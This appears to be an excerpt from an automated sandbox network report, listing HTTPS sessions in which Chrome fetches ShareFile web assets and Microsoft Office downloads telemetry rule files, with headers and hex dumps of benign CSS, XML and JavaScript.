                                                                                                                                                                                                                                                                                Data Ascii: 604C113.006 95.6975 112.973 94.7192 113.067 93.7486ZM143.169 96.6627H137.373C137.414 95.7816 137.22 95.0454 136.793 94.5162C136.543 94.2069 136.197 93.943 135.733 93.7093C134.77 93.2244 133.773 93.1213 132.956 93.4068C132.869 93.3297 132.777 93.2579 132.6


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                119192.168.2.64984613.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC579OUTGET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC531INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 1492
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:03 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 02 Oct 2024 18:05:42 GMT
                                                                                                                                                                                                                                                                                ETag: "f17cade455c1e9df4641950a02b898ec"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 3b02f73dccc5077f1ad544a27a475ed6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: aFDTPyMke8VE_0mbsONzjiOXr7X-penF-XVO_-H0pgsmT1X_qGaFmw==
                                                                                                                                                                                                                                                                                Age: 45978
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC1492INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 7b 61 73 63 65 6e 74 2d 6f 76 65 72 72 69 64 65 3a 39 35 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 50 50 4d 6f 72 69 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 73 72 63 3a 75 72 6c 28 34 30 32 62 37 34 30 35 33 64 32 36 33 32 33 35 39 36 62 33 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 75 72 6c 28 38 32 32 32 34 39 66 64 31 39 38 30 63 32 63 66 37 36 64 38 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 61 73 63 65 6e 74 2d 6f 76 65 72 72 69 64 65 3a 39 35 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 50 50 4d 6f 72 69 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 66 6f 6e 74 2d
                                                                                                                                                                                                                                                                                Data Ascii: @font-face{ascent-override:95%;font-family:PPMori;font-style:normal;font-weight:300;src:url(402b74053d26323596b3.woff2) format("woff2"),url(822249fd1980c2cf76d8.woff) format("woff")}@font-face{ascent-override:95%;font-family:PPMori;font-style:italic;font-


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                120192.168.2.64984713.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC578OUTGET /sharefile-web/sharefiledev-request-list-pilet/1.9.18/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC505INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 30 Sep 2024 15:31:51 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 c2a926ef1bafe1ab239d4761594a8098.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: NAvAFO4h4mvm4h0sBKxDXogg4VGa1dCNoWG1t4UddXBEpmr3BDUUKQ==
                                                                                                                                                                                                                                                                                Age: 45978
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                121192.168.2.64984913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:20 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                x-ms-request-id: a9a22b8f-501e-007b-21d3-195ba2000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180520Z-185b7d577bdwmw4ckbc4ywwmwg00000000v000000000ru76
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                122192.168.2.64985013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:20 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                x-ms-request-id: 67f4a132-701e-0021-11f5-193d45000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180520Z-185b7d577bdfbqmxp7sbqeum4w00000001b000000000hk3f
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                123192.168.2.64984813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:21 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                x-ms-request-id: 077f2d3c-001e-00ad-33bb-19554b000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180521Z-185b7d577bdfx2dd0gsb231cq0000000013000000001cywq
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                124192.168.2.64985113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:21 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 423
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                                x-ms-request-id: df49ad61-f01e-0085-3604-1a88ea000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180521Z-185b7d577bdd4z6mz0c833nvec0000000180000000012ww7
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                125192.168.2.64985213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:21 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 478
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                x-ms-request-id: dd82c002-401e-0016-14c9-1953e0000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180521Z-185b7d577bdcmhtqq5qad662uw00000001g0000000009c43
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                126192.168.2.64985313.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC420OUTGET /sharefile-web/sharefiledev-package-pilet/0.37.12/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 226377
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 02 Oct 2024 12:23:36 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                ETag: "68b7d9cc403c9d5ff3d0c1f9ea0182c2"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 0e75d8f2d484ce463fc04f5c422aa178.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: AlUAlXy-TeQziagIVetw8kSw7v35Dub3SjZFWYEYPcIqZFaoy7tQCg==
                                                                                                                                                                                                                                                                                Age: 45980
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 70 61 63 6b 61 67 65 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 69 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevpackagepilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},i={},o={},a={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 74 69 6f 6e 20 46 28 65 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 7c 7c 21 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 29 72 65 74 75 72 6e 21 31 3b 69 66 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 50 72 6f 78 79 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 29 2c 21 30 7d 63 61 74 63 68
                                                                                                                                                                                                                                                                                Data Ascii: tion F(e){var t=function(){if("undefined"==typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"==typeof Proxy)return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],(function(){}))),!0}catch
